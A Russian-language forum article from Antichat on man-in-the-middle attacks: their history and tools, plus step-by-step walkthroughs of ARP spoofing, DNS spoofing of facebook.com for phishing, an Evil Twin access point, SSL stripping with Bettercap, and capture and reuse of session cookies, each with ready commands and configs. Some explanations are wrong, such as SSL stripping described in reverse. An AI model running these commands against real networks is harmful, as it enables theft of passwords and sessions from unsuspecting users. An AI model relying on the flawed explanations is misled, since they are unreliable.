ANTICHAT - MITM-атаки: Всё, что нужно знать

https://forum.antichat.xyz/attachmen...5551140890.png

То, что суперчасто упоминается в моих статьях.
Давайте развернём эту конфетку.

Всё о MITM атаках: история, развитие и всё, что нужно знать
Введение: от первых сетевых уязвимостей до современных методов перехвата
В эпоху, когда компьютерные сети только начинали формироваться, безопасность данных была не в приоритете. В 70-х и 80-х годах интернета не было - были локальные сети, мейнфреймы и первые протоколы. Тогда злоумышленники, если и появлялись, то скорее как любопытные хакеры-энтузиасты, тестирующие системы на уязвимости.

Но уже в 90-х годах, с ростом популярности интернета и развитием протоколов, появилась возможность перехвата данных. В это время появились первые вариации MITM-атак, которые использовались для перехвата паролей, учетных данных и конфиденциальных сообщений.

Первые шаги: уязвимости в ARP и DNS
Самый первый и очевидный способ вставки в коммуникацию - это атаки, связанные с протоколами ARP и DNS. В 80-х годах было обнаружено, что ARP-протокол, который предназначен для локальных сетей, не защищен от подделки. Злоумышленники начали использовать ARP Spoofing, чтобы перехватывать трафик внутри LAN. Этот метод позволял злоумышленникам становиться "посередине" между устройствами, получая доступ к передаваемой информации и даже изменяя её без ведома участников коммуникации. Аналогично, уязвимости протокола DNS открывали двери для подмены адресов сайтов, перенаправляя пользователей на фальшивые ресурсы. Эти атаки стали первыми серьёзными вызовами для сетевой безопасности, подчеркивая необходимость внедрения механизмов защиты, таких как статическая привязка MAC-адресов, использование DHCP Snooping и DNSSEC, чтобы обеспечить целостность и доверие в сетях.

DNS, изначально - децентрализованный и ненадежный протокол, тоже стал объектом атак. В 90-х годах появились первые атаки типа DNS Spoofing, которые позволяли перенаправлять пользователей на фейковые сайты.
Эти атаки основывались на уязвимости в системах кеширования и недостаточной проверке подлинности ответов DNS-серверов. Злоумышленники использовали их для подмены настоящих IP-адресов, что позволяло им перехватывать конфиденциальную информацию, внедрять вредоносное ПО или проводить фишинговые кампании. В ответ на это были разработаны методы защиты, такие как DNSSEC, который внедряет цифровую подпись для проверки подлинности DNS-ответов, и расширенные механизмы аутентификации, повышающие безопасность системы и усложняющие проведение подобных атак.

Это был своего рода "золотой век" для MITM - без сложных инструментов и с минимальными знаниями можно было устроить перехват данных в локальной сети или даже в интернете.
Они могли перехватывать, изменять или подделывать трафик в локальных сетях и даже в глобальной сети, что делало этот период особенно уязвимым для пользователей и организаций. Отсутствие встроенных механизмов защиты и недостаточная осведомленность о подобных угрозах способствовали активному распространению MITM-атак, что подчеркнуло необходимость разработки и внедрения более надежных систем безопасности.

Развитие инструментов и методов
В 2000-х годах появились первые автоматизированные инструменты для проведения MITM-атак:

Cain & Abel - программа для Windows, которая позволяла перехватывать пароли, делать ARP Spoofing и даже слушать Wi-Fi-сигналы.

Она позволяла перехватывать пароли с помощью методов сниффинга и декодирования, осуществлять ARP Spoofing для перенаправления трафика и проведения MITM-атак, а также слушать Wi-Fi-сигналы для получения информации о беспроводных сетях. Благодаря своему удобству и широкому функционалу Cain & Abel стала широко использоваться как злоумышленниками, так и специалистами по безопасности для тестирования уязвимостей и укрепления защиты сетей.
Ettercap - более мощный кроссплатформенный инструмент, созданный специально для MITM-атак. Он поддерживал ARP Spoofing, DNS Spoofing, фильтрацию пакетов и автоматизацию.

Кроме того, Ettercap предлагал автоматизацию процессов атаки, что делало его особенно популярным среди специалистов по безопасности для тестирования и анализа уязвимостей сетей. Его гибкость и расширяемость позволяли создавать сложные сценарии атак и проводить глубокий анализ сетевого трафика.

Эти инструменты значительно упростили задачу злоумышленников, сделав MITM-атаки доступными даже для новичков.
Это снизило порог входа для злоумышленников, даже для тех, кто не обладает глубокими знаниями в области сетевой безопасности. В результате такие инструменты становились популярными как среди специалистов по безопасности, так и среди злоумышленников, что подчеркивает важность постоянного развития методов защиты сетей и обучения безопасной работе в цифровой среде.

Почему MITM стал революцией в мире злоумышленников
Преимущество MITM - это полнота контроля над трафиком. В отличие от эксплойтов уязвимостей или внедрения вредоносных скриптов, здесь злоумышленник контролирует весь канал коммуникации. Это дает возможность:

Собрать логин и пароль
Перехватить куки, сессионные токены
Переформатировать или подменить содержимое сообщений
Внедрять вредоносный код
Вытянуть личные данные и конфиденциальную информацию

Ключевое преимущество - это невидимость. Пока злоумышленник умеет маскироваться и правильно маскирует свои действия, жертва даже не подозревает, что ее перехватывают.
Это позволяет злоумышленнику спокойно собирать конфиденциальные данные, такие как пароли, личные сообщения или финансовую информацию, без риска быть замеченным. Именно поэтому важна многоуровневая защита сетей, использование шифрования и мониторинг аномалий, чтобы выявлять и предотвращать такие скрытые атаки.
Эволюция MITM-атак: от локальных сетей к глобальному интернету
1. Внутри локальных сетей (LAN)
Здесь всё началось. ARP Spoofing и DNS Spoofing - основные инструменты. Внутри LAN злоумышленник может легко вставить себя между двумя ПК или между компьютером и шлюзом. Внутри LAN эти методы позволяют злоумышленнику легко вставить себя между двумя ПК или между ПК и шлюзом, получая полный контроль над трафиком и возможностью осуществлять дальнейшие атаки или кражу данных. Поэтому защита сети от таких методов, например, использование статических ARP-записей, шифрование трафика и системы обнаружения аномалий, крайне важна. В этом случае он может:

Перехватывать рабочие файлы
Воровать пароли
Внедрять вредоносные скрипты на локальные сайты

2. В публичных Wi-Fi точках
С ростом использования открытых Wi-Fi сетей, злоумышленники начали создавать Evil Twin - фейковые точки доступа, которые выглядят как легитимные. Жертва подключается, а весь трафик идет через злоумышленника, который его перехватывает и анализирует.
Такие фейковые точки доступа маскируются под легитимные сети, часто имея одинаковое название (SSID), что сбивает с толку пользователей.

Когда жертва подключается к Evil Twin, весь её интернет-трафик проходит через злоумышленника. Это позволяет ему перехватывать, анализировать, а иногда и изменять передаваемые данные, что создает угрозу кражи личных данных, паролей, финансовой информации и других конфиденциальных данных.

3. В масштабах интернета
Расширение протоколов безопасности, таких как SSL/TLS, создало новые вызовы. Злоумышленники начали использовать SSL Stripping и Session Hijacking для обхода защиты.

SSL Stripping - это атака, при которой злоумышленник перехватывает первоначальный незашифрованный HTTP-запрос и заменяет его на HTTPS, чтобы пользователь остался в незащищённой версии сайта. В результате пользователь считает, что общается через защищённое соединение, а злоумышленник получает возможность перехватывать передаваемые данные.

Session Hijacking - это метод, при котором злоумышленник похищает или подделывает сессионные куки или токены, чтобы получить доступ к учетной записи жертвы или продолжить сессию без её ведома. Это позволяет злоумышленнику получить несанкционированный доступ к ресурсам, которые защищены аутентификацией.

Текущие методы и инструменты - что используют злоумышленники сегодня
ARP Spoofing и IP Spoofing
Это базовые техники, которые остаются актуальными. В современной реализации используют:

Bettercap - мощное средство автоматизации, позволяющее управлять ARP, DNS, HTTPS и даже Wi-Fi.
Cain & Abel - для Windows-систем, особенно в сетях с Windows-серверами.

DNS Spoofing и DNS Manipulation
Обеспечивают перехват и подмену DNS-запросов. В результате пользователь, даже вводя правильный адрес, попадает на фейковый сайт.

DNS Spoofing (подмена DNS) заключается в том, что злоумышленник подделывает DNS-записи или вмешивается в процесс разрешения доменных имён, чтобы направлять пользователя на ложные IP-адреса. Это позволяет ему перехватывать личные данные, распространять вредоносное ПО или выполнять фишинг.

DNS Manipulation - более широкий термин, включающий любые формы вмешательства в процесс обработки DNS-запросов, такие как изменение DNS-записей на сервере или перенаправление через вредоносные промежуточные узлы.

Wi-Fi Evil Twin и Rogue Access Points
Создание ложных точек доступа - очень популярный метод для атак в публичных местах. Злоумышленник просто настраивает точку с одинаковым названием и паролем, а жертва подключается, думая, что это легитимный интернет.
Злоумышленник настраивает фальшивую точку доступа с тем же названием (SSID) и паролем, что и легитимная сеть в публичных местах, чтобы заставить пользователей подключиться к ней. После этого злоумышленник получает возможность перехватывать передаваемые данные.

SSL Stripping и HTTPS MITM
Обход HTTPS - один из самых сложных вызовов. Но злоумышленники используют mitmproxy, Bettercap, Ettercap для автоматизации этого процесса.

Эти инструменты позволяют перехватывать, просматривать и при необходимости изменять зашифрованный HTTPS-трафик между пользователем и сервером, что потенциально даёт злоумышленникам доступ к конфиденциальной информации, такой как логины, пароли, личные данные и т.д.

Взлом сессий и кража куков
Иногда злоумышленники используютснифферы для перехвата HTTP-заголовков и извлечения сессионных куков. В дальнейшем - используют их для входа в аккаунты жертв (Session Hijacking).
Эти куки содержат идентификаторы сессий, которые позволяют злоумышленнику получить доступ к аккаунту жертвы без необходимости вводить логин и пароль.

https://forum.antichat.xyz/attachmen...5551188408.png

Самые популярные сценарии MITM-атак и их подробный разбор
Давайте рассмотрим наиболее распространенные сценарии и разберем, как именно злоумышленники их реализуют.

Сценарий 1: Атака в публичной Wi-Fi точке - создание Evil Twin
Шаги:

Злоумышленник запускает точку доступа с тем же SSID, что и публичное кафе или аэропорт.
Жертвы подключаются, думая, что это легитимный интернет.
Внутри сети злоумышленник использует Bettercap или Aircrack-ng для ARP Spoofing.
Перехватывает весь трафик - логирует пароли, куки, просматривает незашищенные данные.

Результат: за несколько минут собирается большая база данных личных данных, паролей и сессионных токенов.

Сценарий 2: DNS Spoofing для фишинга
Шаги:

Злоумышленник настраивает DNSChef или Ettercap.
В рамках ARP Spoofing он подменяет DNS-запросы.
Пользователь вводит facebook.com, а попадает на фейковый сайт, созданный злоумышленником.
Жертва вводит логин и пароль, а он попадает к злоумышленнику.

Сценарий 3: SSL Stripping - перевод HTTPS в HTTP
Шаги:

Злоумышленник вставляется в цепочку, используя mitmproxy.
Когда жертва заходит на сайт с HTTPS, автоматический редирект отключается или не работает.
Весь трафик переходит в обычный HTTP - злоумышленник видит все, что вводит пользователь.
В случае с банками, соцсетями, почтовыми сервисами - все пароли и личные данные доступны.

Особенности: современные браузеры используют HSTS, что усложняет задачу, но многие старые сайты или плохо настроенные ресурсы все еще уязвимы.

Почему MITM - это не просто теория, а реальная угроза сегодня
На сегодняшний день MITM-атаки - это не только инструменты хакеров-любителей, а настоящая угроза для бизнеса, государственных структур и обычных пользователей.
Эта тенденция обусловлена тем, что злоумышленники используют все более изощренные методы и автоматизированные инструменты для проведения MITM-атак, что делает их практически невидимыми и трудными для обнаружения. В условиях, когда информационные системы становятся все более сложными и связаны между собой, любая уязвимость может привести к масштабным последствиям: утечке конфиденциальных данных, компрометации инфраструктуры или даже парализации работы целых предприятий и государственных органов. Поэтому защита от таких атак сегодня - это не просто рекомендация, а необходимость для любой организации, стремящейся сохранить свою безопасность и доверие клиентов и партнеров.

Почему?

Рост количества открытых сетей. В кафе, аэропортах и отелях подключение к публичному Wi-Fi - норма.
Плохая реализация HTTPS. Множество сайтов все еще используют устаревшие протоколы или неправильно настроены.
Интернет вещей. Устройства старого типа передают данные без шифрования.
Уязвимости протоколов. Например, уязвимости в SSL 3.0, TLS 1.0 и даже некоторые реализации TLS.

Примеры из практики:

В 2016 году хакеры использовали MITM-атаку на публичный Wi-Fi в аэропорту Лондона, чтобы перехватить сотни логинов и паролей.
В 2018 году злоумышленники перехватили сессии через SSL Stripping и получили доступ к корпоративным аккаунтам нескольких крупных компаний.

Реальные примеры проведения MITM-атак
Для успешной реализации MITM-атаки злоумышленник использует набор команд и инструментов.
Обычно он применяет специальные программы и утилиты, такие как сетевые снифферы, фальшивые прокси-серверы и инструменты для подделки сертификатов, чтобы перехватывать и анализировать передаваемые данные. Кроме того, злоумышленники активно используют техники манипуляции сетевыми протоколами, внедрение вредоносных скриптов или создание поддельных точек доступа Wi-Fi, что позволяет им незаметно вставать между пользователем и легитимным ресурсом. В результате атаки злоумышленник получает возможность получать конфиденциальную информацию, изменять передаваемые данные или запускать дополнительные вредоносные действия без ведома жертвы. Ниже приведены наиболее популярные сценарии и соответствующие команды.

1. ARP Spoofing с помощью
Описание: Перехват трафика внутри локальной сети путем подмены ARP-запросов.

Пример команды:

Код:

arpspoof -i wlan0 -t 192.168.1.10 -r 192.168.1.1

-i wlan0 - интерфейс сети (например, Wi-Fi)
-t 192.168.1.10 - IP-адрес жертвы
-r 192.168.1.1 - IP-адрес шлюза (роутера)

Что делает: Эта команда заставляет жертву думать, что злоумышленник - это шлюз, а шлюз - что злоумышленник - это жертва. В результате весь трафик идет через атакующего.
Она работает следующим образом: злоумышленник отправляет ложные ARP-ответы в локальную сеть, вводя жертву и шлюз в заблуждение относительно MAC-адресов друг друга. В результате, оба устройства считают, что злоумышленник - это надежный шлюз или жертва, и весь сетевой трафик между ними проходит через атакующего. Это позволяет злоумышленнику перехватывать, анализировать и даже изменять передаваемые данные без ведома участников сети.

2. DNS Spoofing с помощью
Описание: Перехват DNS-запросов и подмена ответов.

Запуск Ettercap в режиме командной строки:

Код:

ettercap -T -M arp,dns -i wlan0

-T - запуск в текстовом режиме
-M arp,dns - включение ARP и DNS spoofing
-i wlan0 - интерфейс

Далее, внутри Ettercap можно настроить правила:

Код:

Код:

# В интерактивном режиме можно прописать:

dns_spoof on

dns_spoof_file /etc/ettercap/dns.spoof

Пример файла /etc/ettercap/dns.spoof:

Код:

facebook.com A 192.168.1.100

Это заставит все запросы к facebook.com перенаправлять на IP 192.168.1.100 - фейковый сайт злоумышленника.
В результате такой перенаправки жертва будет считать, что она взаимодействует с настоящим сайтом Facebook, тогда как на самом деле она общается с фальшивым ресурсом злоумышленника. Это позволяет ему собирать личные данные, учетные записи, пароли и другую конфиденциальную информацию, а также проводить дальнейшие атаки, такие как фишинг или распространение вредоносного ПО.

3. Создание фейковой точки Wi-Fi (Evil Twin) с помощью
Конфигурационный файл hostapd.conf:

Код:

Код:

interface=wlan0

driver=nl80211

ssid=FreeWiFi

hw_mode=g

channel=6

auth_algs=1

wmm_enabled=0

Команда для запуска:

Код:

sudo hostapd /path/to/hostapd.conf

Затем злоумышленник может использовать iptables для перенаправления трафика и последующего перехвата. Это позволяет ему перехватывать, фильтровать или модифицировать сетевые пакеты, проходящие через систему. В результате злоумышленник получает возможность полностью контролировать передаваемые данные, просматривать содержимое запросов и ответов, а также внедрять вредоносный код или выполнять другие атаки на сеть или конечных пользователей.

4. Перехват HTTPS с помощью
Запуск Bettercap для автоматического перехвата и SSL-Strip:

Код:

sudo bettercap -iface wlan0

В интерактивном режиме далее можно выполнить:

Код:

Код:

net.probe on

set arp.spoof.targets 192.168.1.10

set http.proxy.sslstrip true

set http.proxy.proxy true

http.proxy on

Это создаст MITM, перехват HTTPS, и при необходимости - переведет его в HTTP, чтобы упростить доступ к содержимому передаваемых данных и повысить вероятность успешного сбора конфиденциальной информации. Такой подход значительно снижает безопасность данных пользователя и создает уязвимость, которую легко использовать для кражи паролей, логинов и других чувствительных данных.

5. Перехват сессионных куков с помощью
Команда для запуска захвата пакетов:

Код:

sudo wireshark -i wlan0 -k

или

Код:

sudo tcpdump -i wlan0 -w capture.pcap

Далее анализируешь файл capture.pcap, находишь HTTP-заголовки с Set-Cookie и извлекаешь куки. Например, в Wireshark можно фильтровать по:

Код:

http.cookie

или

Код:

http contains "session"

6. Внедрение украденных куков в браузер
После получения сессионных куков злоумышленник может воспользоваться инструментами типа Burp Suite или напрямую вставить куки в браузер для доступа к аккаунтам.
Такой метод позволяет обойти необходимость повторной аутентификации и полностью контролировать сессии жертвы, что значительно увеличивает риск компрометации личных данных, финансовых операций или корпоративных ресурсов.

Пример ручного внедрения куки:

В Chrome или Firefox открываешь инструменты разработчика
Вкладка Network - Edit and Resend - Вставляешь полученные куки в HTTP-заголовки

Автоматическая атака с METASPLOIT
Metasploit - мощный фреймворк для эксплуатации и проведения MITM.

Запуск модуля:

Код:

Код:

msfconsole

use auxiliary/spoof/arp_poison

set INTERFACE wlan0

set TARGET 192.168.1.10

set GATEWAY 192.168.1.1

run

Это автоматизирует ARP Spoofing. В результате он сможет просматривать, записывать и при необходимости модифицировать передаваемые данные, включая учетные записи, пароли, личную переписку и другие чувствительные сведения. Такой метод широко используется для проведения информационных атак и сбора конфиденциальной информации без ведома владельцев устройств.

Использование mitmproxy для перехвата и изменения трафика

Код:

mitmproxy -s script.py

где script.py - скрипт на Python, который может менять содержимое запросов/ответов.

Пример скрипта:

Код:

Код:

def response(flow):

    if "example.com" in flow.request.pretty_url:

        flow.response.content = flow.response.content.replace(b"Old Text", b"New Text")

https://forum.antichat.xyz/attachmen...5551220489.png

MITM - это не просто атака, а стиль жизни злоумышленников

Эти команды и сценарии - лишь малая часть возможных манипуляций злоумышленников или тестировщиков. В реальной практике, чтобы добиться успеха, необходимо комбинировать несколько методов, маскироваться и постоянно обновлять свои техники.
За последние 30 лет методы MITM-атак значительно эволюционировали, появлялись новые технологии и инструменты. Но основная идея - оставаться невидимым посредником - осталась неизменной.

Важно помнить, что современные системы безопасности, такие как HSTS, Certificate Pinning и автоматические обновления, делают MITM сложнее, но злоумышленники не стоят на месте. Они используют новые уязвимости, автоматизацию и социальную инженерию.

Для обычных пользователей - это напоминание о необходимости быть бдительными, не доверять публичным сетям и всегда проверять сертификаты. Для специалистов - вызов постоянно совершенствовать свои навыки и инструменты.